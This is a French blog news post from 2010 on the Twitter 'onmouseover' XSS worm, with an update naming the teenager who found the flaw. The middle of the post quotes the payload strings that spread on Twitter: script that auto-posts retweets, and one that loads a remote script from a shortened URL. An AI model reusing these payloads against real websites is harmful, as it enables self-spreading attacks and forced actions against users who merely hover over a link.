Accueil du Blog > High-Tech/Web >> > Twitter hacké : Faille XSS utilisée

Twitter hacké : Faille XSS utilisée

1

Twitter bug Matsta 630x38 Twitter hacké : Faille XSS utilisée

Le site Twitter a été victime d’un détournement dont plusieurs utilisateurs ont pu générer des Rewteets via une faille XSS comme @Matsta, @Matsta, @tbubbaloo et plein d’autres.
Si vous vous rendiez sur votre compte twitter sur le site twitter.com, vous auriez envoyé automatiquement un message (un code) comme ceux-ci :

http://t.co/@ »onmouseover= »document.getElementById(‘status’).value=’RT Matsta’;$(‘.status-update-form’).submit(); »class= »modal-overlay »/
ou celui ci : http://a.no/@ »onmouseover= »;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit() » style= »color:#000;background:#000;/
http://t.co/@ »style= »font-size:999999999999px; »onmouseover= »$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7′) »/

Twitter a donc été victime d’un hack, sans gravité pour les utilsiateurs, juste gênant, à cause d’une faille XSS du système de raccourci d’URL du site (t.co)
Les utilisateurs de client Twitter (Tweetdeck, Hoostsuite…) n’ont pas été concerné par ce bug. Ils ont juste constaté les dégats.
Voici le genre d’erreurs qu’on a pu lire sur le site en se connectant sur sa page twitter :

Message erreur Twitter Twitter hacké : Faille XSS utilisée Twitter pirate Matsta Twitter hacké : Faille XSS utilisée

Un conseil, n’allez plus sur Twitter.com pour poster vos messages ou alors allez y pour vous vous déconnecter (http://twitter.com/logout).

Vous pouvez toujours me suivre (à vos risques et périls :) ) sur Twitter.com/tuxboard.

EDIT 15h20 : la faille a été corrigée.

MAJ 22/09 : Un Australien de 17 ans a admis être l’auteur de cette attaque sur Twitter. Pearce Delphin (@zzap), a reconnu avoir mis au jour une faille dans la sécurité puis avoir entré un code Javascript comme du texte normal dans un message, qui déclenchait l’ouverture de pages web au simple survol de la souris sur le texte.
Mais son idée a été reprise par des hackers qui ont utilisé le code pour rediriger les utilisateurs vers des sites pornographiques ou créer des tweets « vers » qui se répliquaient chaque fois qu’ils étaient lus.
« J’ai fait cela simplement pour voir si le code Javascript pouvait être utilisé dans un tweet (…) Lorsque j’ai posté mon tweet, je n’aurais jamais imaginé que cela allait décoller comme cela. Je n’y avais vraiment pas pensé », a-t-il ajouté.


Articles liés

  • Twitter attaqué par déni de service
    Twitter a été attaqué cette après-midi (15h à Paris) par un déni de service (DOS) qui est une surcharge de [...]
  • Classement Twitter : Ashton Kutcher 1 million d’abonnés
    Un important évènement a eu lieu aujourd’hui sur Internet ! On se demandait qui de Ashton Kutcher (acteur sans emploi) [...]
  • La Révolution Twitter Vidéo Reportage Envoyé Spécial
    Si vous avez raté le reportage d’hier d’envoyé spécial sur le phénomène twitter, vous pouvez le regarder ici :   [...]
  • C’est quoi Twitter ?
    Pour ceux qui se demandent encore ce qu’est Twitter, voici un résumé du service web en diaporama. Twitter, c’est aussi [...]
  • Comptes twitter de lyonnais méconnus qu’il faut suivre !
    Suite au billet de Weetabix sur les 100 comptes twitters français à suivre dont je fais parti (@tuxboard pour me [...]
  • Qu’est-ce que Twitter ?
      Petite animation pour vous expliquer ce qu’est Twitter. Vidéo sous titrée par LePost.fr
  • Jean Sarkozy à l’EPAD : Le site hacké
    Lors de ce weekend, le site de l’EPAD (Etablissement public d’aménagement de La Défense) sur ladefense.fr a été pris d’assaut [...]
  • Google Buzz le Twitter Killer
    Google va sortir son twitter killer : Google Buzz. L’application sera intégrée dans GMail. Etant donné le succès de Twitter, [...]
  • Kanye West n’aime pas Twitter
    Kanye West est mécontent suite à plusieurs faux comptes twitter à son nom. Il le dit (vulgairement), il n’a pas [...]
  • Police sur Twitter
    La police de Boston informe aux habitants sur Twitter ! La preuve avec cas un peu bizarre.   La police [...]

    • Article rédigé par

    21 septembre 2010 - Catégorie : High-Tech/Web
    Mots clés : // // // //

    1 Commentaire

    Ajouter un commentaire

    snipman917 a commenté le 23 septembre 2010 à 23 h 03 min // #1

    Ce soir c’est au tour de facebook!Enfin c’est peut être pas un hack, juste le site down, apparement ca pourait être une attaque de leur DNS!

    Laisser un commentaire

    Poster un commentaire aujourd'hui Mardi 21 septembre 2010 à 14:53

    (non publié)

    Afin d’assurer la sécurité et la qualité de ce blog, tout commentaire de SPAM, injurieux, diffamant
    susceptible ainsi de faire l'objet d'un délit de presse, (Loi du 29 juillet 1881 sur la liberté de la presse) sera modéré.
    Il en va de même pour les commentaires de trolls ou haters !